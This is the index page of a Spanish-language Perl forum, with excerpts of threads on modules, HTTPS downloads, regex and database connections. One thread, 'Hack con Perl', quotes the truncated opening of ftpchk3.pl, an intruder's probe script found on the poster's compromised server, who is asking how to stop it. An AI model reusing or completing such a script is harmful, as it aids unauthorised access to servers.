• Publicidad

Fecha actual 2025-02-02 23:47 @032

News News of Foro - Perl en Español

Site map of Foro - Perl en Español » Foro : Foro - Perl en Español

La comunidad de programadores en Perl de habla-hispana.

Cómo puedo instalar ImageMagick

Necesito instalar el Image::Magick en mi hosting, pero pues la gente de mi hosting dice que lo tiene instalado ya... Y como yo no se nada de Perl 8) entonces me toco creerles...

¿Hay alguna forma de instalarlo manualmente, porque definitivamente ya comprobé que no está instalado en mi hosting...
Read more : Cómo puedo instalar ImageMagick | Vistas : 2843 | Respuestas : 4 | Foro : Módulos

Cómo bajar un archivo de texto desde una página HTTPS

Soy super nuevo trabajando con Perl y estoy un poco perdido. ¿Alguien sabe cómo desde un servidor Unix puedo bajar un archivo de texto que está en una pagina web HTTPS?

Si lo quiero bajar directamente de la página manualmente, coloco el path y me pide un login y password. Después de eso entra a la página que tiene el archivo que necesito. Lo que quiero hacer es lo mismo pero de manera automática desde ...
Read more : Cómo bajar un archivo de texto desde una página HTTPS | Vistas : 1191 | Respuestas : 6 | Foro : Básico

Skype y Firefox podrían ser declarados productos ilegales

Esto como consecuencia de una ley que la Unión Europea está promoviendo para impedir la piratería en el ciberespacio

Imagen

Al parecer la Unión Europea está empecinada a dar más de un dolor de cabeza a los usuarios comunes y corrientes de Internet.

Primero está a punto de terminar con la Internet libre tal y como la conocemos, pues a través de algunos dispositivos y de la configuración de las redes de comunicaciones podrán auditar ...
Read more : Skype y Firefox podrían ser declarados productos ilegales | Vistas : 1261 | Respuestas : 2 | Foro : Pasando el rato

Ejecutar una URL

Hola a todos.

Necesito mandar a llamar un URL con parámetos, los parámetros se los enviaré en la URL algo así como: http://syz.com/smspp.aspx?numero=777751 ... rte=miguel

Esa URL me devuelve una cadena, de mensaje enviado o mensaje no enviado, yo necesito mandar a ejecutar el llamado a esta URL desde un programa en Perl, hay algún módulo CPAN para hacerlo, en este momento lo hago con lynx pero es muy ...
Read more : Ejecutar una URL | Vistas : 2045 | Respuestas : 2 | Foro : Avanzado

Comparar archivos por fecha

Hola, ¿qué tal?

Me dirijo a ustedes en busca de ayuda.

Tengo una aplicación con la que accedo a un directorio y me fijo los archivos .txt que hay, y me los traigo.

Lo que necesito es que me los devuelva ordenados por fecha de creación.

Espero su ayuda..
gracias.

Acá les dejo el código actual, así se entiende un poco más.

#Abrimos el directorio

my $dir = '\Desktop\Archivostxt/';

opendir(DIR, $dir) or die $!; ...
Read more : Comparar archivos por fecha | Vistas : 2643 | Respuestas : 11 | Foro : Básico

Sustitución dentro de un fichero con Perl

Hola a todos,
A ver si me podéis echar una mano con esto... (me imagino que para los gurús del Perl les será bastante sencillo).

Tengo un fichero el cual contiene x líneas. Y quiero sustituir por cada línea del fichero el literal ";&;" por este otro "; ;".

Imaginemos que mi fichero se llama prueba.txt. Esto es lo que hago:

my $comando = "cat prueba.txt | ";

sustituye($comando);

sub sustituye{

my $file = shift; ...
Read more : Sustitución dentro de un fichero con Perl | Vistas : 1461 | Respuestas : 1 | Foro : Avanzado

Usando slash y backslash en regex

Hola.

Tengo un string lleno escapes sin "escapar" y necesito "escaparlos":

my %escapes = (
'\t' => "\t",
'\r' => "\r",
'\n' => "\n",
'\a' => "\a"
);

my $string = '\aHola\n\tDOS EOL\r\n';
foreach my $escape ( keys %escapes ) {
my $final = $escapes{$escape};
$string =~ s/\Q$escapes\E/$final/g;
}
say $string;

Eso funciona muy bien, pero resulta que si tengo 'america\\argentina' (por decir algo) surgen problemas con la regexp.

¿Cómo trabajo los backslash, slash y ...
Read more : Usando slash y backslash en regex | Vistas : 2230 | Respuestas : 3 | Foro : Intermedio

Conectar BD SYBASE 2

Saludos perleros, tengo un problema con un programa y creo que el error anda por ahí. ¿Me podrían echar la mano?

Yo tengo mis 2 programas
conectarsb.pm
uno.pl

El primero es:package conectarsb;
use strict;
use DBI;
# variables a editar
my $db_user = "usuario";
my $db_pass = "clave";
my $host_name = "la ip misterio";
my $db_name = "DB";
# vars
my $q_string = "DBI:sybase:host=$host_name;database=$db_name";
sub connect{
return (DBI->connect ($q_string, $db_user, $db_pass,
{PrintError => 0, RaiseError ...
Read more : Conectar BD SYBASE 2 | Vistas : 2631 | Respuestas : 4 | Foro : Bases de datos

Extracción datos de web

Hola, soy nuevo en esto pero necesito sacar de un sitio web público ciertos datos de las páginas y ordenarlos en una hoja Excel, por ejemplo. El sitio es: http://www.protecnet.go.cr/InsumoSys/Principal.htm

En la consulta por plaguicidas y coadyuvantes obtengo toda la lista de unos 2876 registros de los cuales me interesa sacar los datos (por ejemplo éstos que corresponden al primer registro) y así que el programa me extraiga esos ...
Read more : Extracción datos de web | Vistas : 3763 | Respuestas : 3 | Foro : Intermedio

Hack con Perl

Estimados foreros,

No quiero molestar con esta consulta pero no encuentro forma de bloquear el continuo hackeo a mi servidor.

Cada vez que entran encuentro un archivo en Perl de nombre ftpchk3.pl
y que contiene esto:

#!/usr/bin/perl -w

$| = 1;

my $smtp = 'smtp.mail.ru';
my $dns = '208.67.222.222';

print "Content-type: text/plain; charset=windows-1251\n\n" if $ENV{HTTP_USER_AGENT};

#print "System info\n";
#print "-----------\n\n";
#print "$^O";
#print "\n", `uname -a` if $^O !~ /win/i;
#print "\n\n";

#print "Perl modules\n"; ...
Read more : Hack con Perl | Vistas : 3762 | Respuestas : 4 | Foro : Avanzado

Identificarte  •  Registrarse

Estadísticas

Mensajes totales 36890 • Temas totales 7432 • Usuarios totales 1981